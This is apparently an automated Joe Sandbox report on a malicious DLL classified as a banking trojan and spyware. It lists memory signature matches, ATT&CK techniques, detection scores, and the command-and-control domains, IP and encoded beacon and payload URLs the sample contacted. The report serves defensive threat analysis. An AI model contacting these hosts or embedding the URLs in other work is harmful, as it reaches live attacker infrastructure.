Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information2	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter1	Boot or Logon Initialization Scripts	Process Injection812	Software Packing2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	PowerShell1	Logon Script (Windows)	Logon Script (Windows)	DLL Side-Loading1	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rootkit4	NTDS	System Information Discovery36	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Virtualization/Sandbox Evasion3	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection812	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Regsvr321	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	16%	Virustotal		Browse
SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	10%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.3.regsvr32.exe.5c2e4a0.2.unpack	100%	Avira	HEUR/AGEN.1132033	Download File
2.3.regsvr32.exe.5ea94a0.1.unpack	100%	Avira	HEUR/AGEN.1132033	Download File
2.2.regsvr32.exe.33f0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Link
tls13.taboola.map.fastly.net	0%	Virustotal	Browse
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
api10.laptok.at	11%	Virustotal	Browse
img.img-taboola.com	1%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	URL Reputation	safe
http://www.microsoft.co	0%	URL Reputation	safe
http://www.microsoft.co	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://c56.lepini.at/jvassets/xI/t64.dat	100%	Avira URL Cloud	phishing
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
contextual.media.net	184.30.24.22	true	false		high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	0%, Virustotal, Browse	unknown
hblg.media.net	184.30.24.22	true	false		high
c56.lepini.at	34.65.144.159	true	true	8%, Virustotal, Browse	unknown
lg3.media.net	184.30.24.22	true	false		high
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	34.65.144.159	true	false	11%, Virustotal, Browse	unknown
geolocation.onetrust.com	104.20.184.68	true	false		high
api10.laptok.at	34.65.144.159	true	false	11%, Virustotal, Browse	unknown
www.msn.com	unknown	unknown	false		high
srtb.msn.com	unknown	unknown	false		high
img.img-taboola.com	unknown	unknown	true	1%, Virustotal, Browse	unknown
web.vortex.data.msn.com	unknown	unknown	false		high
cvision.media.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov	false	Avira URL Cloud: safe	unknown
http://api3.lepini.at/api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI	false	Avira URL Cloud: safe	unknown
http://c56.lepini.at/jvassets/xI/t64.dat	true	Avira URL Cloud: phishing	unknown
http://api10.laptok.at/api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	false	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txt	powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	false		high
http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN	regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.microsoft.co	powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://https://file://USER.ID%lu.exe/upd	powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.%s.comPA	explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://www.msn.com/de-ch/?ocid=iehp	explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	false		high
http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk	explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.65.144.159	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	true
104.20.184.68	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	353281
Start date:	16.02.2021
Start time:	00:56:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 40s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	4
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winDLL@36/159@18/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 84.2% (good quality ratio 79.5%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. TCP Packets have been reduced to 100 Created / dropped Files have been reduced to 100 Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.43.193.48, 88.221.62.148, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 184.30.24.22, 51.104.144.132, 92.122.213.194, 92.122.213.247, 152.199.19.161, 52.155.217.156, 205.185.216.10, 205.185.216.42, 20.54.26.129 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, cvision.media.net.edgekey.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, e607.d.akamaiedge.net, skypedataprdcolcus15.cloudapp.net, web.vortex.data.microsoft.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:58:27	API Interceptor	43x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
34.65.144.159	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	NJPcHPuRcG.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	c56.lepini.at/jvassets/xI/t64.dat
104.20.184.68	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse
	NJPcHPuRcG.dll	Get hash	malicious	Browse
	Ne6A4k8vK6.dll	Get hash	malicious	Browse
	13xakh1PtD.dll	Get hash	malicious	Browse
	DUcKsYsyX0.dll	Get hash	malicious	Browse
	RI51uAIUyL.dll	Get hash	malicious	Browse
	Server.exe	Get hash	malicious	Browse
	mon48_cr.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse
	Wh102yYa..dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse
	acr1.dll	Get hash	malicious	Browse
	TRIGANOcr.dll	Get hash	malicious	Browse
	BullGuard.dll	Get hash	malicious	Browse
	Jidert.dll	Get hash	malicious	Browse
	Vu2QRHVR8C.dll	Get hash	malicious	Browse
	header[1].jpg.dll	Get hash	malicious	Browse
	SimpleAudio.dll	Get hash	malicious	Browse
	cSPuZxa7I4.dll	Get hash	malicious	Browse
151.101.1.44	http://s3-eu-west-1.amazonaws.com/hjdpjni/ogbim#qs=r-acacaeeikdgeadkieeefjaehbihabababaefahcaccajbiackdcagfkbkacb	Get hash	malicious	Browse	cdn.taboola.com/libtrc/w4llc-network/loader.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hblg.media.net	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	184.30.24.22
	NJPcHPuRcG.dll	Get hash	malicious	Browse	23.210.250.97
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	23.210.250.97
	13xakh1PtD.dll	Get hash	malicious	Browse	23.210.250.97
	DUcKsYsyX0.dll	Get hash	malicious	Browse	23.210.250.97
	RI51uAIUyL.dll	Get hash	malicious	Browse	23.210.250.97
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	23.210.250.97
	mon44_cr.dll	Get hash	malicious	Browse	23.210.250.97
	mon41_cr.dll	Get hash	malicious	Browse	184.30.24.22
	mon4498.dll	Get hash	malicious	Browse	184.30.24.22
	e888888888.dll	Get hash	malicious	Browse	23.218.208.23
	1233.exe	Get hash	malicious	Browse	184.30.24.22
	Server.exe	Get hash	malicious	Browse	184.30.24.22
	2200.dll	Get hash	malicious	Browse	184.30.24.22
	mon48_cr.dll	Get hash	malicious	Browse	184.30.24.22
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	92.122.253.103
	Wh102yYa..dll	Get hash	malicious	Browse	23.210.250.97
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	2.20.86.97
	8.prtyok.dll	Get hash	malicious	Browse	104.84.56.24
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	104.84.56.24
tls13.taboola.map.fastly.net	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	151.101.1.44
	NJPcHPuRcG.dll	Get hash	malicious	Browse	151.101.1.44
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	151.101.1.44
	13xakh1PtD.dll	Get hash	malicious	Browse	151.101.1.44
	DUcKsYsyX0.dll	Get hash	malicious	Browse	151.101.1.44
	RI51uAIUyL.dll	Get hash	malicious	Browse	151.101.1.44
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	151.101.1.44
	mon44_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon41_cr.dll	Get hash	malicious	Browse	151.101.1.44
	mon4498.dll	Get hash	malicious	Browse	151.101.1.44
	e888888888.dll	Get hash	malicious	Browse	151.101.1.44
	1233.exe	Get hash	malicious	Browse	151.101.1.44
	Server.exe	Get hash	malicious	Browse	151.101.1.44
	2200.dll	Get hash	malicious	Browse	151.101.1.44
	mon48_cr.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse	151.101.1.44
	8.prtyok.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Bulz.349310.9384.dll	Get hash	malicious	Browse	151.101.1.44
	SecuriteInfo.com.Variant.Razy.840176.14264.dll	Get hash	malicious	Browse	151.101.1.44
contextual.media.net	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	184.30.24.22
	NJPcHPuRcG.dll	Get hash	malicious	Browse	23.210.250.97
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	23.210.250.97
	13xakh1PtD.dll	Get hash	malicious	Browse	23.210.250.97
	DUcKsYsyX0.dll	Get hash	malicious	Browse	23.210.250.97
	RI51uAIUyL.dll	Get hash	malicious	Browse	23.210.250.97
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	23.210.250.97
	mon44_cr.dll	Get hash	malicious	Browse	23.210.250.97
	mon41_cr.dll	Get hash	malicious	Browse	184.30.24.22
	mon4498.dll	Get hash	malicious	Browse	184.30.24.22
	e888888888.dll	Get hash	malicious	Browse	23.218.208.23
